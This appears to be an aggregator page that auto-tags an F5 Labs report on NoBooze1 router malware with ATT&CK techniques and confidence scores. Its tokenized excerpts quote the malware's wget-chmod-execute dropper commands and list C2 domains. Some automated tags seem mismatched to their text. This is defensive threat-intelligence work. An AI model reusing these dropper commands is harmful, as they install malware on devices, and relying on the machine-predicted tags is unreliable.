TTPwire Vol. 1 · MITRE ATT&CK·Tagged

← All stories

F5 Labs

NoBooze1 Malware Targets TP-Link Routers via CVE-2019-9082

2025-07-16 · Read original ↗

ATT&CK techniques detected

17 predictions
T1027.002Software Packing
99%
“##f95eb5c3a77380e8a6205add1aff59d xle1 c9befe591df01c4dbe700deb855e9424e18d2195 xale1 inspecting the nobooze1 malware x86 - 64 binary “ xale1 ” f5 labs focused attention on the “ xale1 ” binary for further analysis – purely due to familiarity with the x64 architecture. the binary…”
T1027Obfuscated Files or Information
94%
“initial binary by renaming itself to a random four letter filename and then deleting the newly renamed file. finally, the memory segment is marked as protected and executable, and the unpacked code is executed ( see figure 4 ). perhaps unsurprisingly, the unpacked code is actuall…”
T1190Exploit Public-Facing Application
91%
“distinct families of exploit payloads remain, shown in figure 1 in descending order of targeting volume. for the remainder of the analysis, we will be focusing on “ exploit _ family _ 1 ” ( top right ) which delivers malware we ’ ve named nobooze1 after its x64 binary “ xale1 ”. …”
T1055.001Dynamic-link Library Injection
88%
“’ s entry point. conveniently, the unpacker does not defeat debugging with gdb within a vm sandbox. this means that break - pointing right before the jump to the unpacked code allows for a capture of the process ’ s memory, which in turn comfortably enables further binary analysi…”
T1190Exploit Public-Facing Application
86%
“nobooze1 malware targets tp - link routers via cve - 2019 - 9082 the sensor intel series is created in partnership with efflux, who maintains a globally distributed network of sensors from which we derive attack telemetry. additional insights and contributions provided by the f5 …”
T1190Exploit Public-Facing Application
83%
“note that the first stage one url shares infrastructure with the tp - link targeting. the consistent exploit payload behavior and shared infrastructure indicate that exploitation targeting raisecom web interfaces is being conducted by the same actor targeting tp - link routers. w…”
T1190Exploit Public-Facing Application
80%
“it seems unlikely that vulnerable tp - link routers support such a diverse range of architectures ( see listing 2 ). this in turn suggests the possibility that the malware may be intended for general, wider, usage and that the malware may have been authored by someone other than …”
T1190Exploit Public-Facing Application
80%
“injection via a country query parameter in tp - link ’ s proprietary extension to the luci openwrt configuration interface1 ( not affiliated with tp - link ). the lack of input sanitization leads to remote code execution ( rce ), presumably through embedding the parameter in an o…”
T1190Exploit Public-Facing Application
59%
“##21 ) targeting is on the rise – we will dig into this activity in the next section. cve - 2020 - 8958 ( guangzhou onu ) halved activity, along with cve - 2019 - 9082 ( thinkphp ) and cve - 2020 - 11625 ( avertx camera ). cve - 2025 - 31324 ( sap netweaver ) appears in the top 1…”
T1055.001Dynamic-link Library Injection
58%
“harder to author. however, the malware author goes out of their way to make writing a signature straight - forward by including the string “ twinks : 3 ” in plain text ( which is printed to stdout when the binary exits ). figure 3 : an overview of the xale1 binary. the yellow are…”
T1190Exploit Public-Facing Application
56%
“rf % s / nkc % s ; - busybox wget % s / meow / nk % s - o % s / nkd % s ; chmod 777 % s / nkd % s ; % s / nkd % s % s ; rm - rf % s / nkd % s ; - rm - rf wget - lo * nobooze1 rat - like shell commands the unpacked binary contains a large vocabulary of shell commands ( e. g. scp, …”
T1027Obfuscated Files or Information
54%
“gnu / linux ), statically linked, no section header xale1 : elf 64 - bit lsb executable, x86 - 64, version 1 ( sysv ), statically linked, no section header listing 3 71db668e79827f43f6ba4bd0997613f33f686094 a5le1 9ddd04fb260073640d8ac8b795a61295c3506df6 a7le1 a2ae7d4777351c012d09…”
T1588.006Vulnerabilities
50%
“) has established a moderate upward trend ( remember that the y - axis here is logarithmic scale ). cve - 2024 - 7120 ( raisecom, bottom right ) is seeing an uptick in targeting, from the same threat actor targeting tp - link routers with nobooze1malware, and time will tell if ta…”
T1059.004Unix Shell
50%
“initially manually connecting to this url over http, the following shell commands are run ( where % s are c string format parameters supplied at runtime ) : - rm - rf % s / nk * ; - rm % s / nk * ; - wget - q http : / / % s / meow / nk % s - o % s / nka % s ; chmod 777 % s / nka …”
T1071Application Layer Protocol
44%
“8 ( google ’ s primary dns ) - 8. 8. 4. 4 ( google ’ s secondary dns ) suspected c2 server domains : - cross - compiling [. ] org ( suspended by dns registrar, pdr ltd ) - i - kiss - boys [. ] com ( as14956 routerhosting llc ) - furry - femboys [. ] top ( as14956 - routerhosting …”
T1572Protocol Tunneling
37%
“##aaed80 /. - launch gdb for xale1. - verify 0x008175a9 is the expected jump instruction ( jmp r13 – opcode 41ffe5 ). - breakpoint at 0x008175a9. - run to the breakpoint. - introspect / proc / pid / maps and capture the first segment with memory protection flags r - xp ( e. g. us…”
T1105Ingress Tool Transfer
35%
“8 ( google ’ s primary dns ) - 8. 8. 4. 4 ( google ’ s secondary dns ) suspected c2 server domains : - cross - compiling [. ] org ( suspended by dns registrar, pdr ltd ) - i - kiss - boys [. ] com ( as14956 routerhosting llc ) - furry - femboys [. ] top ( as14956 - routerhosting …”

Summary

Sensor Intel Series: July 2025 CVE Trends